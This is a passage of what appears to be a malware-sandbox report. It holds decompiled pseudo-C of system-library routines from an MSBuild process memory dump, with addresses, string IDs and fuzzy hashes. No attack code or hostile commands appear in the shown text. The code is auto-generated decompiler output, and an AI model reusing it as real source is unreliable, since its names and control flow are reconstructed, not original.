                                            						E010BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                            					}
                                            					if(( *0x10f8724 & 0x00000008) != 0) {
                                            						E010C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                            					}
                                            					_t117 = _v44;
                                            					goto L26;
                                            				}
                                            				while(E010D15B5(0x10f8ae4, _t83, _t97, _t97) >= 0) {
                                            					_t97 = _v28;
                                            					_t83 = _t83 + 2;
                                            					if(_t83 < _v40) {
                                            						continue;
                                            					}
                                            					goto L10;
                                            				}
                                            				goto L24;
                                            			}
























                                            0x010d0eb7
                                            0x010d0eb9
                                            0x010d0ec0
                                            0x010d0ec2
                                            0x010d0ecd
                                            0x010d105b
                                            0x010d105b
                                            0x010d1061
                                            0x010d1066
                                            0x010d1066
                                            0x010d106b
                                            0x010d1073
                                            0x010d1073
                                            0x010d0ed3
                                            0x010d0ed6
                                            0x010d0edc
                                            0x010d0ee0
                                            0x010d0ee7
                                            0x010d0ef0
                                            0x010d0ef5
                                            0x010d0efa
                                            0x010d0efc
                                            0x010d0efd
                                            0x010d0f03
                                            0x010d0f04
                                            0x010d0f06
                                            0x010d0f07
                                            0x010d0f09
                                            0x010d0f0e
                                            0x010d0f14
                                            0x010d0f23
                                            0x010d0f2d
                                            0x010d0f34
                                            0x010d0f34
                                            0x010d0f14
                                            0x010d0f52
                                            0x00000000
                                            0x00000000
                                            0x010d0f58
                                            0x010d0f73
                                            0x010d0f74
                                            0x010d0f79
                                            0x010d0f7d
                                            0x010d0f80
                                            0x010d0f86
                                            0x010d0fab
                                            0x010d0fb5
                                            0x010d0fc6
                                            0x010d0fd1
                                            0x010d0fe3
                                            0x010d0fd3
                                            0x010d0fdc
                                            0x010d0fdc
                                            0x010d0feb
                                            0x010d1009
                                            0x010d1009
                                            0x010d1015
                                            0x010d1027
                                            0x010d1017
                                            0x010d1020
                                            0x010d1020
                                            0x010d102f
                                            0x010d103c
                                            0x010d103c
                                            0x010d1048
                                            0x010d1050
                                            0x010d1050
                                            0x010d1055
                                            0x00000000
                                            0x010d1055
                                            0x010d0f88
                                            0x010d0f9e
                                            0x010d0fa2
                                            0x010d0fa9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010d0fa9
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 996fca6935ff05755ca32902303c69886c98858367b8fbca9d62c460d3ce2980
                                            • Instruction ID: 48756e307853bc24b7d28fb02e15d2c251bf0a8d1dfea2c7921722f454fff46f
                                            • Opcode Fuzzy Hash: 996fca6935ff05755ca32902303c69886c98858367b8fbca9d62c460d3ce2980
                                            • Instruction Fuzzy Hash: F851AC713083429FE324EF28D884B5BBBE5EBC4704F14096DFAD687690DA71E805CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0103F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char* _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v44;
                                            				char _v52;
                                            				intOrPtr _v56;
                                            				char _v60;
                                            				intOrPtr _v72;
                                            				void* _t51;
                                            				void* _t58;
                                            				signed short _t82;
                                            				short _t84;
                                            				signed int _t91;
                                            				signed int _t100;
                                            				signed short* _t103;
                                            				void* _t108;
                                            				intOrPtr* _t109;
                                            
                                            				_t103 = __ecx;
                                            				_t82 = __edx;
                                            				_t51 = E01024120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                            				if(_t51 >= 0) {
                                            					_push(0x21);
                                            					_push(3);
                                            					_v56 =  *0x7ffe02dc;
                                            					_v20 =  &_v52;
                                            					_push( &_v44);
                                            					_v28 = 0x18;
                                            					_push( &_v28);
                                            					_push(0x100020);
                                            					_v24 = 0;
                                            					_push( &_v60);
                                            					_v16 = 0x40;
                                            					_v12 = 0;
                                            					_v8 = 0;
                                            					_t58 = E01049830();
                                            					_t87 =  *[fs:0x30];
                                            					_t108 = _t58;
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                            					if(_t108 < 0) {
                                            						L11:
                                            						_t51 = _t108;
                                            					} else {
                                            						_push(4);
                                            						_push(8);
                                            						_push( &_v36);
                                            						_push( &_v44);
                                            						_push(_v60);
                                            						_t108 = E01049990();
                                            						if(_t108 < 0) {
                                            							L10:
                                            							_push(_v60);
                                            							E010495D0();
                                            							goto L11;
                                            						} else {
                                            							_t109 = L01024620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                            							if(_t109 == 0) {
                                            								_t108 = 0xc0000017;
                                            								goto L10;
                                            							} else {
                                            								_t21 = _t109 + 0x18; // 0x18
                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                            								 *_t109 = 1;
                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                            								 *(_t109 + 0xe) = _t82;
                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                            								E0104F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                            								_t91 =  *_t103 & 0x0000ffff;
                                            								_t100 = _t91 & 0xfffffffe;
                                            								_t84 = 0x5c;
                                            								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                            										_push(_v60);
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                            										_t51 = 0xc0000106;
                                            									} else {
                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                            										goto L5;
                                            									}
                                            								} else {
                                            									L5:
                                            									 *_a4 = _t109;
                                            									_t51 = 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t51;
                                            			}

























                                            0x0103f0d3
                                            0x0103f0d9
                                            0x0103f0e0
                                            0x0103f0e7
                                            0x0103f0f2
                                            0x0103f0f4
                                            0x0103f0f8
                                            0x0103f100
                                            0x0103f108
                                            0x0103f10d
                                            0x0103f115
                                            0x0103f116
                                            0x0103f11f
                                            0x0103f123
                                            0x0103f124
                                            0x0103f12c
                                            0x0103f130
                                            0x0103f134
                                            0x0103f13d
                                            0x0103f144
                                            0x0103f14b
                                            0x0103f152
                                            0x0107bab0
                                            0x0107bab0
                                            0x0103f158
                                            0x0103f158
                                            0x0103f15a
                                            0x0103f160
                                            0x0103f165
                                            0x0103f166
                                            0x0103f16f
                                            0x0103f173
                                            0x0107baa7
                                            0x0107baa7
                                            0x0107baab
                                            0x00000000
                                            0x0103f179
                                            0x0103f18d
                                            0x0103f191
                                            0x0107baa2
                                            0x00000000
                                            0x0103f197
                                            0x0103f19b
                                            0x0103f1a2
                                            0x0103f1a9
                                            0x0103f1af
                                            0x0103f1b2
                                            0x0103f1b6
                                            0x0103f1b9
                                            0x0103f1c4
                                            0x0103f1d8
                                            0x0103f1df
                                            0x0103f1e3
                                            0x0103f1eb
                                            0x0103f1ee
                                            0x0103f1f4
                                            0x0103f20f
                                            0x0107bab7
                                            0x0107babb
                                            0x0107bacc
                                            0x0107bad1
                                            0x0103f215
                                            0x0103f218
                                            0x0103f226
                                            0x0103f22b
                                            0x00000000
                                            0x0103f22b
                                            0x0103f1f6
                                            0x0103f1f6
                                            0x0103f1f9
                                            0x0103f1fb
                                            0x0103f1fb
                                            0x0103f1f4
                                            0x0103f191
                                            0x0103f173
                                            0x0103f152
                                            0x0103f203

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction ID: 41b9cfa4054c30777bd4a48e2a6169fcee94a82ccea38c224ce80caa52c674ff
                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                            • Instruction Fuzzy Hash: DD517FB1504711AFD321DF19C840A6BBBF8FF98710F108A2DFA9597690E7B4E914CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E01083540(intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v88;
                                            				intOrPtr _v92;
                                            				char _v96;
                                            				char _v352;
                                            				char _v1072;
                                            				intOrPtr _v1140;
                                            				intOrPtr _v1148;
                                            				char _v1152;
                                            				char _v1156;
                                            				char _v1160;
                                            				char _v1164;
                                            				char _v1168;
                                            				char* _v1172;
                                            				short _v1174;
                                            				char _v1176;
                                            				char _v1180;
                                            				char _v1192;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				short _t41;
                                            				short _t42;
                                            				intOrPtr _t80;
                                            				intOrPtr _t81;
                                            				signed int _t82;
                                            				void* _t83;
                                            
                                            				_v12 =  *0x10fd360 ^ _t82;
                                            				_t41 = 0x14;
                                            				_v1176 = _t41;
                                            				_t42 = 0x16;
                                            				_v1174 = _t42;
                                            				_v1164 = 0x100;
                                            				_v1172 = L"BinaryHash";
                                            				_t81 = E01040BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                            				if(_t81 < 0) {
                                            					L11:
                                            					_t75 = _t81;
                                            					E01083706(0, _t81, _t79, _t80);
                                            					L12:
                                            					if(_a4 != 0xc000047f) {
                                            						E0104FA60( &_v1152, 0, 0x50);
                                            						_v1152 = 0x60c201e;
                                            						_v1148 = 1;
                                            						_v1140 = E01083540;
                                            						E0104FA60( &_v1072, 0, 0x2cc);
                                            						_push( &_v1072);
                                            						E0105DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                            						E01090C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                            						_push(_v1152);
                                            						_push(0xffffffff);
                                            						E010497C0();
                                            					}
                                            					return E0104B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                            				}
                                            				_t79 =  &_v352;
                                            				_t81 = E01083971(0, _a4,  &_v352,  &_v1156);
                                            				if(_t81 < 0) {
                                            					goto L11;
                                            				}
                                            				_t75 = _v1156;
                                            				_t79 =  &_v1160;
                                            				_t81 = E01083884(_v1156,  &_v1160,  &_v1168);
                                            				if(_t81 >= 0) {
                                            					_t80 = _v1160;
                                            					E0104FA60( &_v96, 0, 0x50);
                                            					_t83 = _t83 + 0xc;
                                            					_push( &_v1180);
                                            					_push(0x50);
                                            					_push( &_v96);
                                            					_push(2);
                                            					_push( &_v1176);
                                            					_push(_v1156);
                                            					_t81 = E01049650();
                                            					if(_t81 >= 0) {
                                            						if(_v92 != 3 || _v88 == 0) {
                                            							_t81 = 0xc000090b;
                                            						}
                                            						if(_t81 >= 0) {
                                            							_t75 = _a4;
                                            							_t79 =  &_v352;
                                            							E01083787(_a4,  &_v352, _t80);
                                            						}
                                            					}
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                            				}
                                            				_push(_v1156);
                                            				E010495D0();
                                            				if(_t81 >= 0) {
                                            					goto L12;
                                            				} else {
                                            					goto L11;
                                            				}
                                            			}































                                            0x01083552
                                            0x0108355a
                                            0x0108355d
                                            0x01083566
                                            0x01083567
                                            0x0108357e
                                            0x0108358f
                                            0x010835a1
                                            0x010835a5
                                            0x0108366b
                                            0x0108366b
                                            0x0108366d
                                            0x01083672
                                            0x01083679
                                            0x01083685
                                            0x0108368d
                                            0x0108369d
                                            0x010836a7
                                            0x010836b8
                                            0x010836c6
                                            0x010836c7
                                            0x010836dc
                                            0x010836e1
                                            0x010836e7
                                            0x010836e9
                                            0x010836e9
                                            0x01083703
                                            0x01083703
                                            0x010835b5
                                            0x010835c0
                                            0x010835c4
                                            0x00000000
                                            0x00000000
                                            0x010835ca
                                            0x010835d7
                                            0x010835e2
                                            0x010835e6
                                            0x010835e8
                                            0x010835f5
                                            0x010835fa
                                            0x01083603
                                            0x01083604
                                            0x01083609
                                            0x0108360a
                                            0x01083612
                                            0x01083613
                                            0x0108361e
                                            0x01083622
                                            0x01083628
                                            0x0108362f
                                            0x0108362f
                                            0x01083636
                                            0x01083638
                                            0x0108363b
                                            0x01083642
                                            0x01083642
                                            0x01083636
                                            0x01083657
                                            0x01083657
                                            0x0108365c
                                            0x01083662
                                            0x01083669
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 852ba2914041263d0982f89ec995ad973e792c5d4cb95bc8f0e85e720b3d9f09
                                            • Instruction ID: 109a6518b3a492f06c45d4a46365c0da58beb722bb2bd8a281a9ae3cf4e76e0c
                                            • Opcode Fuzzy Hash: 852ba2914041263d0982f89ec995ad973e792c5d4cb95bc8f0e85e720b3d9f09
                                            • Instruction Fuzzy Hash: E74166F1D0452D9BDB21EA54CC80FDEB77CAB54718F0085A5EA88AB240DB319E98CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E010D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                            				signed int _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				char _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				void* __ebx;
                                            				void* _t35;
                                            				signed int _t42;
                                            				char* _t48;
                                            				signed int _t59;
                                            				signed char _t61;
                                            				signed int* _t79;
                                            				void* _t88;
                                            
                                            				_v28 = __edx;
                                            				_t79 = __ecx;
                                            				if(E010D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                            					L13:
                                            					_t35 = 0;
                                            					L14:
                                            					return _t35;
                                            				}
                                            				_t61 = __ecx[1];
                                            				_t59 = __ecx[0xf];
                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                            				_v36 = _a8 << 0xc;
                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                            				asm("sbb esi, esi");
                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                            				if(_t42 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t59);
                                            					_push(0xffffffff);
                                            					if(E01049730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                            						_push(_t61);
                                            						E010CA80D(_t59, 1, _v20, 0);
                                            						_t88 = 4;
                                            					}
                                            				}
                                            				_t35 = E010CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                            				if(_t35 < 0) {
                                            					goto L14;
                                            				}
                                            				E010D1293(_t79, _v40, E010D07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                            				if(E01027D50() == 0) {
                                            					_t48 = 0x7ffe0380;
                                            				} else {
                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            					E010C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                            				}
                                            				goto L13;
                                            			}

















                                            0x010d05c5
                                            0x010d05ca
                                            0x010d05d3
                                            0x010d06db
                                            0x010d06db
                                            0x010d06dd
                                            0x010d06e3
                                            0x010d06e3
                                            0x010d05dd
                                            0x010d05e7
                                            0x010d05f6
                                            0x010d0600
                                            0x010d0607
                                            0x010d0610
                                            0x010d0615
                                            0x010d061a
                                            0x010d061c
                                            0x010d061e
                                            0x010d0624
                                            0x010d0625
                                            0x010d0627
                                            0x010d0628
                                            0x010d0631
                                            0x010d0640
                                            0x010d064d
                                            0x010d0654
                                            0x010d0654
                                            0x010d0631
                                            0x010d066d
                                            0x010d0674
                                            0x00000000
                                            0x00000000
                                            0x010d0692
                                            0x010d069e
                                            0x010d06b0
                                            0x010d06a0
                                            0x010d06a9
                                            0x010d06a9
                                            0x010d06b8
                                            0x010d06d6
                                            0x010d06d6
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction ID: 6c15e77d57bce289b9d2866e7777224f52aaf834a41682401ccb16c1c0930eba
                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                            • Instruction Fuzzy Hash: 5531D532704346ABE710DE19CD45F9B7BD9AB88754F144129FA98DB284E770E904CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E01083884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                            				char _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _v16;
                                            				char* _v20;
                                            				short _v22;
                                            				char _v24;
                                            				intOrPtr _t38;
                                            				short _t40;
                                            				short _t41;
                                            				void* _t44;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            
                                            				_v16 = __edx;
                                            				_t40 = 0x14;
                                            				_v24 = _t40;
                                            				_t41 = 0x16;
                                            				_v22 = _t41;
                                            				_t38 = 0;
                                            				_v12 = __ecx;
                                            				_push( &_v8);
                                            				_push(0);
                                            				_push(0);
                                            				_push(2);
                                            				_t43 =  &_v24;
                                            				_v20 = L"BinaryName";
                                            				_push( &_v24);
                                            				_push(__ecx);
                                            				_t47 = 0;
                                            				_t48 = E01049650();
                                            				if(_t48 >= 0) {
                                            					_t48 = 0xc000090b;
                                            				}
                                            				if(_t48 != 0xc0000023) {
                                            					_t44 = 0;
                                            					L13:
                                            					if(_t48 < 0) {
                                            						L16:
                                            						if(_t47 != 0) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                            						}
                                            						L18:
                                            						return _t48;
                                            					}
                                            					 *_v16 = _t38;
                                            					 *_a4 = _t47;
                                            					goto L18;
                                            				}
                                            				_t47 = L01024620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				if(_t47 != 0) {
                                            					_push( &_v8);
                                            					_push(_v8);
                                            					_push(_t47);
                                            					_push(2);
                                            					_push( &_v24);
                                            					_push(_v12);
                                            					_t48 = E01049650();
                                            					if(_t48 < 0) {
                                            						_t44 = 0;
                                            						goto L16;
                                            					}
                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                            						_t48 = 0xc000090b;
                                            					}
                                            					_t44 = 0;
                                            					if(_t48 < 0) {
                                            						goto L16;
                                            					} else {
                                            						_t17 = _t47 + 0xc; // 0xc
                                            						_t38 = _t17;
                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                            							_t48 = 0xc000090b;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_t48 = _t48 + 0xfffffff4;
                                            				goto L18;
                                            			}















                                            0x01083893
                                            0x01083896
                                            0x01083899
                                            0x0108389f
                                            0x010838a0
                                            0x010838a4
                                            0x010838a9
                                            0x010838ac
                                            0x010838ad
                                            0x010838ae
                                            0x010838af
                                            0x010838b1
                                            0x010838b4
                                            0x010838bb
                                            0x010838bc
                                            0x010838bd
                                            0x010838c4
                                            0x010838c8
                                            0x010838ca
                                            0x010838ca
                                            0x010838d5
                                            0x0108393e
                                            0x01083940
                                            0x01083942
                                            0x01083952
                                            0x01083954
                                            0x01083961
                                            0x01083961
                                            0x01083967
                                            0x0108396e
                                            0x0108396e
                                            0x01083947
                                            0x0108394c
                                            0x00000000
                                            0x0108394c
                                            0x010838ea
                                            0x010838ee
                                            0x010838f8
                                            0x010838f9
                                            0x010838ff
                                            0x01083900
                                            0x01083902
                                            0x01083903
                                            0x0108390b
                                            0x0108390f
                                            0x01083950
                                            0x00000000
                                            0x01083950
                                            0x01083915
                                            0x0108391d
                                            0x0108391d
                                            0x01083922
                                            0x01083926
                                            0x00000000
                                            0x01083928
                                            0x0108392b
                                            0x0108392b
                                            0x01083935
                                            0x01083937
                                            0x01083937
                                            0x00000000
                                            0x01083935
                                            0x01083926
                                            0x010838f0
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryName
                                            • API String ID: 0-215506332
                                            • Opcode ID: 393b34b1848fc93b60088e8d90602fa57b78c31a1c2ec12c27021bb10ba6a850
                                            • Instruction ID: 11de0175e092ce637f16ec6fb5b7d40a4435575e67b1496d971e7b6ad8045380
                                            • Opcode Fuzzy Hash: 393b34b1848fc93b60088e8d90602fa57b78c31a1c2ec12c27021bb10ba6a850
                                            • Instruction Fuzzy Hash: 8F31057290461AFFDB16EA58C945DAFBBB4FB94F20F014169E9D5AB240D731DE00C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 33%
                                            			E0103D294(void* __ecx, char __edx, void* __eflags) {
                                            				signed int _v8;
                                            				char _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				intOrPtr _v64;
                                            				char* _v68;
                                            				intOrPtr _v72;
                                            				char _v76;
                                            				signed int _v84;
                                            				intOrPtr _v88;
                                            				char _v92;
                                            				intOrPtr _v96;
                                            				intOrPtr _v100;
                                            				char _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t35;
                                            				char _t38;
                                            				signed int _t40;
                                            				signed int _t44;
                                            				signed int _t52;
                                            				void* _t53;
                                            				void* _t55;
                                            				void* _t61;
                                            				intOrPtr _t62;
                                            				void* _t64;
                                            				signed int _t65;
                                            				signed int _t66;
                                            
                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x10fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                            				_v105 = __edx;
                                            				_push( &_v92);
                                            				_t52 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push( &_v104);
                                            				_push(0);
                                            				_t59 = __ecx;
                                            				_t55 = 2;
                                            				if(E01024120(_t55, __ecx) < 0) {
                                            					_t35 = 0;
                                            					L8:
                                            					_pop(_t61);
                                            					_pop(_t64);
                                            					_pop(_t53);
                                            					return E0104B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                            				}
                                            				_v96 = _v100;
                                            				_t38 = _v92;
                                            				if(_t38 != 0) {
                                            					_v104 = _t38;
                                            					_v100 = _v88;
                                            					_t40 = _v84;
                                            				} else {
                                            					_t40 = 0;
                                            				}
                                            				_v72 = _t40;
                                            				_v68 =  &_v104;
                                            				_push( &_v52);
                                            				_v76 = 0x18;
                                            				_push( &_v76);
                                            				_v64 = 0x40;
                                            				_v60 = _t52;
                                            				_v56 = _t52;
                                            				_t44 = E010498D0();
                                            				_t62 = _v88;
                                            				_t65 = _t44;
                                            				if(_t62 != 0) {
                                            					asm("lock xadd [edi], eax");
                                            					if((_t44 | 0xffffffff) != 0) {
                                            						goto L4;
                                            					}
                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                            					E010495D0();
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                            					goto L4;
                                            				} else {
                                            					L4:
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                            					if(_t65 >= 0) {
                                            						_t52 = 1;
                                            					} else {
                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                            						}
                                            					}
                                            					_t35 = _t52;
                                            					goto L8;
                                            				}
                                            			}

































                                            0x0103d29c
                                            0x0103d2a6
                                            0x0103d2b1
                                            0x0103d2b5
                                            0x0103d2b6
                                            0x0103d2bc
                                            0x0103d2bd
                                            0x0103d2be
                                            0x0103d2bf
                                            0x0103d2c2
                                            0x0103d2c4
                                            0x0103d2cc
                                            0x0103d384
                                            0x0103d34b
                                            0x0103d34f
                                            0x0103d350
                                            0x0103d351
                                            0x0103d35c
                                            0x0103d35c
                                            0x0103d2d6
                                            0x0103d2da
                                            0x0103d2e1
                                            0x0103d361
                                            0x0103d369
                                            0x0103d36d
                                            0x0103d2e3
                                            0x0103d2e3
                                            0x0103d2e3
                                            0x0103d2e5
                                            0x0103d2ed
                                            0x0103d2f5
                                            0x0103d2fa
                                            0x0103d302
                                            0x0103d303
                                            0x0103d30b
                                            0x0103d30f
                                            0x0103d313
                                            0x0103d318
                                            0x0103d31c
                                            0x0103d320
                                            0x0103d379
                                            0x0103d37d
                                            0x00000000
                                            0x00000000
                                            0x0107affe
                                            0x0107b001
                                            0x0107b011
                                            0x00000000
                                            0x0103d322
                                            0x0103d322
                                            0x0103d330
                                            0x0103d337
                                            0x0103d35d
                                            0x0103d339
                                            0x0103d33f
                                            0x0103d38c
                                            0x0103d38c
                                            0x0103d33f
                                            0x0103d349
                                            0x00000000
                                            0x0103d349

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: c780d085c60363481220c0048651271f3338e39e725c85a14ec347fb86dba450
                                            • Instruction ID: b758b149ba95889a0e71a2d5a51142f784cc2d581ffe22ee53801173bd1a2509
                                            • Opcode Fuzzy Hash: c780d085c60363481220c0048651271f3338e39e725c85a14ec347fb86dba450
                                            • Instruction Fuzzy Hash: 42318DB1508305AFD361DF68C980AAFBBECEBD9654F40492EF9D483250D635DD08CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E01011B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                            				intOrPtr _v8;
                                            				char _v16;
                                            				intOrPtr* _t26;
                                            				intOrPtr _t29;
                                            				void* _t30;
                                            				signed int _t31;
                                            
                                            				_t27 = __ecx;
                                            				_t29 = __edx;
                                            				_t31 = 0;
                                            				_v8 = __edx;
                                            				if(__edx == 0) {
                                            					L18:
                                            					_t30 = 0xc000000d;
                                            					goto L12;
                                            				} else {
                                            					_t26 = _a4;
                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                            						goto L18;
                                            					} else {
                                            						E0104BB40(__ecx,  &_v16, __ecx);
                                            						_push(_t26);
                                            						_push(0);
                                            						_push(0);
                                            						_push(_t29);
                                            						_push( &_v16);
                                            						_t30 = E0104A9B0();
                                            						if(_t30 >= 0) {
                                            							_t19 =  *_t26;
                                            							if( *_t26 != 0) {
                                            								goto L7;
                                            							} else {
                                            								 *_a8 =  *_a8 & 0;
                                            							}
                                            						} else {
                                            							if(_t30 != 0xc0000023) {
                                            								L9:
                                            								_push(_t26);
                                            								_push( *_t26);
                                            								_push(_t31);
                                            								_push(_v8);
                                            								_push( &_v16);
                                            								_t30 = E0104A9B0();
                                            								if(_t30 < 0) {
                                            									L12:
                                            									if(_t31 != 0) {
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                            									}
                                            								} else {
                                            									 *_a8 = _t31;
                                            								}
                                            							} else {
                                            								_t19 =  *_t26;
                                            								if( *_t26 == 0) {
                                            									_t31 = 0;
                                            								} else {
                                            									L7:
